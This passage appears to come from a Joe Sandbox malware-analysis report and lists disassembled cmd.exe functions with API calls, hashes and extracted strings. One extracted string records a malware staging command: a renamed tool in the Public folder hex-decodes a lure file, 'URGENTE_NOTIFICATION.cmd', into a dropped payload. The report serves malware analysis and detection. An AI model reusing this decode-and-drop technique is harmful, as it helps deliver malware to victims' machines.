Instruction ID: 431260e9a9999b2d0fa64a8765d92f8e75832b9ad63cfda5f68c858073ee83ce
Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction Fuzzy Hash: FFE0E541F9A60BD5FE2C2B63A8471BA1354BF59B44F5C2438DD5DAB382EE2DB091C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction ID: c316280409f8a204d9ff277e9532ac2cf873da481576fc64f195b4b4f6a20661
Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction Fuzzy Hash: 99F03C72A18642C6EB448B15F842078FBA0FF89B41B5C9439D90EA7354DF3CE481CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

exit.KERNELBASE ref: 00007FF683F84C31

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: exit
String ID:
API String ID: 2483651598-0
Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction ID: ded4e43e66d3a070d6ac953010f683ef24841e6a2976aad4d8d447877a9e16e8
Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction Fuzzy Hash: E7C08030704646C7EF1C6732285303D55997F0A301F0C543CC517D3381DD2CD404C240

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF683F76F97), ref: 00007FF683F8550C

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: DefaultLangUser
String ID:
API String ID: 768647712-0
Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction ID: e707aed205fb9cf7a6223f901e94f021952f7468073fe90bad1240a4a1167fe8
Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction Fuzzy Hash: 70E08CA2D5A252CBF5582A4260432B41A53EF6A786F884039C60DAB6C0CD2D2841D248

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F82E8B

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction ID: ad791780ff8884508154b41fe5868d7a2a06022cb3f9809a5539915afe4cd15c
Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction Fuzzy Hash: 00F0B421B0978180EA448B57B5421295290AF48BE0B0C8338EE7D97BC5DE3CD451C300

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF683F77650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F776E5

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

_get_osfhandle.MSVCRT ref: 00007FF683F77745
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77759
_get_osfhandle.MSVCRT ref: 00007FF683F7776C
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77783
_get_osfhandle.MSVCRT ref: 00007FF683F777A3
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F777C9
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F77808
wcsrchr.MSVCRT ref: 00007FF683F949BE
_wcsnicmp.MSVCRT ref: 00007FF683F94A02
SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F94A81

Part of subcall function 00007FF683F801B8: _get_osfhandle.MSVCRT ref: 00007FF683F801C4
Part of subcall function 00007FF683F801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6

Strings

DPATH, xrefs: 00007FF683F9499A

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
String ID: DPATH
API String ID: 95024817-2010427443
Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
Instruction ID: 72eecc004b00313fe1cb898cc2ec54ce59df19f70c50c436f45bbaa896edba85
Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
Instruction Fuzzy Hash: 8612C632A18682CAEB64DF15A4011B9B7A1FF99754F48523DEE4EA7794DF3CE404CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_wcsupr.MSVCRT ref: 00007FF683F9EF33
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EF98
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EFA9
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EFBF
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9EFDC
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EFED
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F003
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F022
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F083
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F092
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F0A5
towupper.MSVCRT ref: 00007FF683F9F0DB
wcschr.MSVCRT ref: 00007FF683F9F135
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F16C
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F185

Part of subcall function 00007FF683F801B8: _get_osfhandle.MSVCRT ref: 00007FF683F801C4
Part of subcall function 00007FF683F801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6

Strings

<noalias>, xrefs: 00007FF683F9F03C
CMD.EXE, xrefs: 00007FF683F9F19D

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 1161012917-1690691951
Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
Instruction ID: c59a6c81036a72dcea36d0b5ef28b592d5de66d637f8689b21107f99135547b5
Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
Instruction Fuzzy Hash: 5C919F21B09642CAFB149F61E8121BD7AA0BF49B59F4C413ADD0EB3694DF3CA445C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F715BD

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F71620
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F71638
FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F716C0

Part of subcall function 00007FF683F71560: FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F717F0
Part of subcall function 00007FF683F71560: FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F7180C
Part of subcall function 00007FF683F71560: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7183E

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8AC35
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8AC68

Strings

\\?\, xrefs: 00007FF683F8AC99

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
String ID: \\?\
API String ID: 628682198-4282027825
Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
Instruction ID: e846dfedeb46d1a4de4cfb4f1ae5665d19806169cf2ca98c6d7865a34e0c5539
Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
Instruction Fuzzy Hash: E5E18D22A086C2D6EF649F25D8422F963A1FF45749F484139EA0E977D4EF3CE549C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

_tell.MSVCRT ref: 00007FF683F7CEAF
memset.MSVCRT ref: 00007FF683F7CF5C
_wcsicmp.MSVCRT ref: 00007FF683F7CFAE
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F7D003
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F7D01E
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7D044
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F8C889
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F8C8A2

Strings

C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 , xrefs: 00007FF683F8C9F1
GOTO, xrefs: 00007FF683F7D0A3

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 $GOTO
API String ID: 3863671652-4181662350
Opcode ID: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
Instruction ID: 0cd0b3630e68df3a2d90c90231f19b017705bbc7c5dbf64b3674a02c2bf865c3
Opcode Fuzzy Hash: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
Instruction Fuzzy Hash: AFE1DE21A0D682C6FA649B16E4563B966A0BF85744F4C403DE90EF73E5DF7CE846C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON

Download Yara Rule

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F83189
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF683F8319F
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F831B5
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF683F831CB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F8E619
GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0 ref: 00007FF683F8E738

Strings

%02d%s%02d%s, xrefs: 00007FF683F8E799
, xrefs: 00007FF683F8E718
HH:mm:ss t, xrefs: 00007FF683F8E629
%2d%s%02d%s%02d%s%02d, xrefs: 00007FF683F83236, 00007FF683F8E5C9
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F83147

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Time$File$System$FormatInfoLocalLocale
String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
API String ID: 55602301-2548490036
Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
Instruction ID: fc332110fc6cd80418747da26cc9a4672aecd510549ce4bdde765319e8d75e73
Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
Instruction Fuzzy Hash: 27A1D532B18742D6EB148F11E4422BE77A1FF94754F58013AEA5EA76A4EF3CE544CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683FA1408: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA142A
Part of subcall function 00007FF683FA1408: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA144F

Part of subcall function 00007FF683FA1408: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA146C

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA15A8
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA15D1
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA160B
RtlDosPathNameToNtPathName_U.NTDLL ref: 00007FF683FA1635
memset.MSVCRT ref: 00007FF683FA1677
memmove.MSVCRT ref: 00007FF683FA16AD
memmove.MSVCRT ref: 00007FF683FA16E6
NtFsControlFile.NTDLL ref: 00007FF683FA171D
RtlNtStatusToDosError.NTDLL ref: 00007FF683FA172F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA173D
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683FA1754
RtlFreeHeap.NTDLL ref: 00007FF683FA177F
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1797

Part of subcall function 00007FF683FA1A40: memset.MSVCRT ref: 00007FF683FA1AA6
Part of subcall function 00007FF683FA1A40: memset.MSVCRT ref: 00007FF683FA1ACC
Part of subcall function 00007FF683FA1A40: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B3E
Part of subcall function 00007FF683FA1A40: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B67
Part of subcall function 00007FF683FA1A40: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1BD7
Part of subcall function 00007FF683FA1A40: _wcsicmp.MSVCRT ref: 00007FF683FA1C05

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
String ID:
API String ID: 3935429995-0
Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
Instruction ID: 8d1918fb772dca596d7b64b5f9a1c7f67757ac329bea5b1748c612268478e728
Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
Instruction Fuzzy Hash: D661F526A18752C6EB14CF21A40557DBBA4FF89F59F0A9139EE4AA3790EF3CD401C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F735B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON

Download Yara Rule

APIs

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F73620

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
Instruction ID: 561c349f05d72446dbc2d8c69a4889e751d43f2a2a625cf4f780ebef550170d1
Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
Instruction Fuzzy Hash: 7C91B232A09682C6EB648F25D8116FD76A0FF49749F08853AEE4E97794EF3CD545C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F72220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F72287
memset.MSVCRT ref: 00007FF683F722AD
memset.MSVCRT ref: 00007FF683F722D3
memset.MSVCRT ref: 00007FF683F722F9

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F723F6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72415
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72434
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72453

